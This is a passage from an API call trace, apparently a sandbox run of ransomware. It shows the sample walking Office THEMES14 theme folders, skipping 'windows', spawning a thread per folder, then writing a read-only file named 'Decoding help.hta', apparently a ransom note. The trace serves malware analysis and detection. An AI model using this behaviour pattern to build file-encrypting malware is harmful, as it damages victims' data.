lpParameter=0x24fb72f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.111] CloseHandle (hObject=0x384) returned 1 [0050.111] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0050.111] lstrcmpW (lpString1=".", lpString2="RICEPAPR") returned -1 [0050.111] lstrcmpW (lpString1="..", lpString2="RICEPAPR") returned -1 [0050.111] lstrcmpiW (lpString1="windows", lpString2="RICEPAPR") returned 1 [0050.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.113] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.113] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="RICEPAPR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR" [0050.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*" [0050.114] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24fef3d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.122] CloseHandle (hObject=0x384) returned 1 [0050.122] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RIPPLE", cAlternateFileName="")) returned 1 [0050.122] lstrcmpW (lpString1=".", lpString2="RIPPLE") returned -1 [0050.122] lstrcmpW (lpString1="..", lpString2="RIPPLE") returned -1 [0050.122] lstrcmpiW (lpString1="windows", lpString2="RIPPLE") returned 1 [0050.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.122] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="RIPPLE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE" [0050.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*" [0050.122] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f6f448, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.132] CloseHandle (hObject=0x384) returned 1 [0050.133] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RMNSQUE", cAlternateFileName="")) returned 1 [0050.133] lstrcmpW (lpString1=".", lpString2="RMNSQUE") returned -1 [0050.133] lstrcmpW (lpString1="..", lpString2="RMNSQUE") returned -1 [0050.133] lstrcmpiW (lpString1="windows", lpString2="RMNSQUE") returned 1 [0050.135] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="RMNSQUE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE" [0050.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*" [0050.135] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2504f570, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.159] CloseHandle (hObject=0x384) returned 1 [0050.159] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SATIN", cAlternateFileName="")) returned 1 [0050.159] lstrcmpW (lpString1=".", lpString2="SATIN") returned -1 [0050.159] lstrcmpW (lpString1="..", lpString2="SATIN") returned -1 [0050.159] lstrcmpiW (lpString1="windows", lpString2="SATIN") returned 1 [0050.162] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="SATIN" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN" [0050.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*" [0050.162] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x250af710, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.204] CloseHandle (hObject=0x384) returned 1 [0050.204] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SKY", cAlternateFileName="")) returned 1 [0051.115] lstrcmpW (lpString1=".", lpString2="SKY") returned -1 [0051.115] lstrcmpW (lpString1="..", lpString2="SKY") returned -1 [0051.115] lstrcmpiW (lpString1="windows", lpString2="SKY") returned 1 [0051.118] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.118] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="SKY" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY" [0051.118] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*" [0051.118] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0051.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25398268, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0051.119] CloseHandle (hObject=0x3d4) returned 1 [0051.119] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SLATE", cAlternateFileName="")) returned 1 [0051.119] lstrcmpW (lpString1=".", lpString2="SLATE") returned -1 [0051.119] lstrcmpW (lpString1="..", lpString2="SLATE") returned -1 [0051.119] lstrcmpiW (lpString1="windows", lpString2="SLATE") returned 1 [0051.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.122] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="SLATE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE" [0051.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*" [0051.122] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0051.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x253b02d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0051.123] CloseHandle (hObject=0x3d4) returned 1 [0051.123] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SONORA", cAlternateFileName="")) returned 1 [0051.123] lstrcmpW (lpString1=".", lpString2="SONORA") returned -1 [0051.123] lstrcmpW (lpString1="..", lpString2="SONORA") returned -1 [0051.123] lstrcmpiW (lpString1="windows", lpString2="SONORA") returned 1 [0051.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.126] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.126] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="SONORA" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA" [0051.126] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*" [0051.126] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0051.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x253c8338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0051.127] CloseHandle (hObject=0x3d4) returned 1 [0051.127] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SPRING", cAlternateFileName="")) returned 1 [0051.127] lstrcmpW (lpString1=".", lpString2="SPRING") returned -1 [0051.127] lstrcmpW (lpString1="..", lpString2="SPRING") returned -1 [0051.127] lstrcmpiW (lpString1="windows", lpString2="SPRING") returned 1 [0051.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.130] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="SPRING" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING" [0051.130] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*" [0051.130] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0051.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x253e03a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0051.131] CloseHandle (hObject=0x3d4) returned 1 [0051.131] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STRTEDGE", cAlternateFileName="")) returned 1 [0051.131] lstrcmpW (lpString1=".", lpString2="STRTEDGE") returned -1 [0051.131] lstrcmpW (lpString1="..", lpString2="STRTEDGE") returned -1 [0051.131] lstrcmpiW (lpString1="windows", lpString2="STRTEDGE") returned 1 [0051.133] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="STRTEDGE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE" [0051.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*" [0051.133] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0051.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x253f8408, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0051.134] CloseHandle (hObject=0x3d4) returned 1 [0051.134] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STUDIO", cAlternateFileName="")) returned 1 [0051.134] lstrcmpW (lpString1=".", lpString2="STUDIO") returned -1 [0051.134] lstrcmpW (lpString1="..", lpString2="STUDIO") returned -1 [0051.134] lstrcmpiW (lpString1="windows", lpString2="STUDIO") returned 1 [0051.137] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.137] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.137] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="STUDIO" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO" [0051.137] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*" [0051.137] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0051.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25410470, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0051.138] CloseHandle (hObject=0x3d4) returned 1 [0051.138] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SUMIPNTG", cAlternateFileName="")) returned 1 [0051.138] lstrcmpW (lpString1=".", lpString2="SUMIPNTG") returned -1 [0051.138] lstrcmpW (lpString1="..", lpString2="SUMIPNTG") returned -1 [0051.138] lstrcmpiW (lpString1="windows", lpString2="SUMIPNTG") returned 1 [0051.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="SUMIPNTG" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG" [0051.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*" [0051.141] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0051.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x254284d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0051.142] CloseHandle (hObject=0x3d4) returned 1 [0051.142] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24e4f00, ftCreationTime.dwHighDateTime=0x1c06b0e, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc24e4f00, ftLastWriteTime.dwHighDateTime=0x1c06b0e, nFileSizeHigh=0x0, nFileSizeLow=0x1c6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES.INF", cAlternateFileName="")) returned 1 [0051.142] lstrcpyW (in: lpString1=0x987a788, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0051.142] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0051.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\Decoding help.hta" [0051.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\decoding help.hta")) returned 0xffffffff [0052.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0053.627] WriteFile (in: hFile=0x260, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x18e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x18e1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.968] CloseHandle (hObject=0x260) returned 1 [0055.306] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0059.199] lstrcmpiW (lpString1="Decoding help.hta", 